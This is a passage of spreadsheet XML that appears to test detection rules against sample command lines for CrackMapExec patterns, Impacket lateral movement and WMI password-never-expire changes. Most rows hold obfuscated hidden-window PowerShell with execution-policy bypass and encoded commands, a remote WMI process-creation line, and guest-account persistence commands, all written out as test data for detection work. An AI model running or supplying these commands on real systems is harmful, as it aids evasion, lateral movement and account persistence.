          <t>powershell.exe -nop /"NonInteractive" -"WindowStyle" Hidden /"ExecutionPolicy" Bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I120" s="44" t="n"/>
      <c r="J120" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="43" t="n"/>
      <c r="B121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C121" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D121" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E121" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"NonInteractive" -"WindowStyle" Hidden -"ExecutionPolicy" Bypass -"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I121" s="43" t="n"/>
      <c r="J121" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="43" t="n"/>
      <c r="B122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C122" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D122" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E122" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -NoNiNTeRActIVe -"WindowStyle" Hidden -EXECUtionpOLIcY Bypass -"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I122" s="43" t="n"/>
      <c r="J122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="43" t="n"/>
      <c r="B123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C123" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D123" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E123" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -nOniNteRacTivE -"WindowStyle" Hidden -EXECuTIONpOlIcy Bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I123" s="43" t="n"/>
      <c r="J123" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="43" t="n"/>
      <c r="B124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C124" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D124" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E124" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"NonInteractive" -"WindowStyle" Hidden -"ExecutionPolicy" Bypass /"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="43" t="n"/>
      <c r="J124" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="43" t="n"/>
      <c r="B125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C125" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D125" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E125" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOPRofiLe -ExeCuTionpOlicy Bypass -winDoWSTYle Hidden -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="43" t="n"/>
      <c r="J125" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K125" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="43" t="n"/>
      <c r="B126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C126" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D126" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E126" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOpRoFIle /"ExecutionPolicy" Bypass /"WindowStyle" Hidden /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I126" s="43" t="n"/>
      <c r="J126" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K126" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="43" t="n"/>
      <c r="B127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C127" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D127" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E127" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOproFile -EXEcuTiOnpOLiCY Bypass -"WindowStyle" Hidden -EnCOdEdcomMaNd UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="43" t="n"/>
      <c r="J127" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="43" t="n"/>
      <c r="B128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C128" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D128" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E128" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"NoProfile" -wINdoWStyLE Hidden -enCODEDCOMmaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="43" t="n"/>
      <c r="J128" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K128" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="43" t="n"/>
      <c r="B129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C129" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D129" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E129" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass /"NoProfile" -ws Hidden -"EncodedCommand" &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="43" t="n"/>
      <c r="J129" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K129" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="43" t="n"/>
      <c r="B130" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C130" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D130" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E130" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -NOPROfIlE -ws Hidden -ENcodedcoMMaNd &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I130" s="43" t="n"/>
      <c r="J130" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K130" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="43" t="n"/>
      <c r="B131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C131" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D131" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E131" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTIonPOliCY Bypass -NOPrOFiLe -ws Hidden -enCOdEDcOmmaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I131" s="44" t="n"/>
      <c r="J131" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K131" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="43" t="n"/>
      <c r="B132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C132" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D132" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E132" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -ws Hidden -enc &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I132" s="44" t="n"/>
      <c r="J132" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="43" t="n"/>
      <c r="B133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C133" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D133" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E133" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -nop -ws Hidden -eNcoDEDcommaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I133" s="43" t="n"/>
      <c r="J133" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="43" t="n"/>
      <c r="B134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C134" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D134" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E134" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"WindowStyle" Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="44" t="n"/>
      <c r="J134" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K134" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="43" t="n"/>
      <c r="B135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C135" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D135" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E135" s="44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F135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I135" s="44" t="n"/>
      <c r="J135" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="43" t="n"/>
      <c r="B136" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C136" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D136" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E136" s="44" t="inlineStr">
        <is>
          <t>wmic useraccount where name='guest' set passwordexpires=0</t>
        </is>
      </c>
      <c r="F136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I136" s="44" t="n"/>
      <c r="J136" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K136" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="43" t="n"/>
      <c r="B137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C137" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D137" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E137" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WmiObject -Class Win32_UserAccount -Filter \"Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I137" s="43" t="n"/>
      <c r="J137" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="43" t="n"/>
      <c r="B138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C138" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D138" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E138" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="43" t="n"/>
      <c r="J138" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="43" t="n"/>
      <c r="B139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C139" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D139" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E139" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F139" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G139" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H139" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I139" s="43" t="n"/>
      <c r="J139" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K139" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="43" t="n"/>
      <c r="B140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C140" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D140" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E140" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="43" t="n"/>
      <c r="J140" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K140" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="43" t="n"/>
      <c r="B141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C141" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D141" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E141" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I141" s="43" t="n"/>
      <c r="J141" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K141" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="43" t="n"/>
      <c r="B142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C142" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D142" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E142" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance /"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I142" s="43" t="n"/>
      <c r="J142" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="43" t="n"/>
      <c r="B143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C143" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D143" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E143" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance /"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I143" s="43" t="n"/>
      <c r="J143" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="43" t="n"/>
      <c r="B144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C144" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D144" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E144" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I144" s="43" t="n"/>
      <c r="J144" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K144" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="43" t="n"/>
      <c r="B145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C145" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D145" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E145" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="43" t="n"/>
      <c r="J145" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K145" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="43" t="n"/>
      <c r="B146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C146" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D146" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E146" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMANd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="43" t="n"/>
      <c r="J146" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K146" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="43" t="n"/>
      <c r="B147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C147" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D147" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E147" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="43" t="n"/>
      <c r="J147" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="43" t="n"/>
      <c r="B148" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C148" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D148" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E148" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F148" s="44" t="b">
        <v>0</v>
      </c>
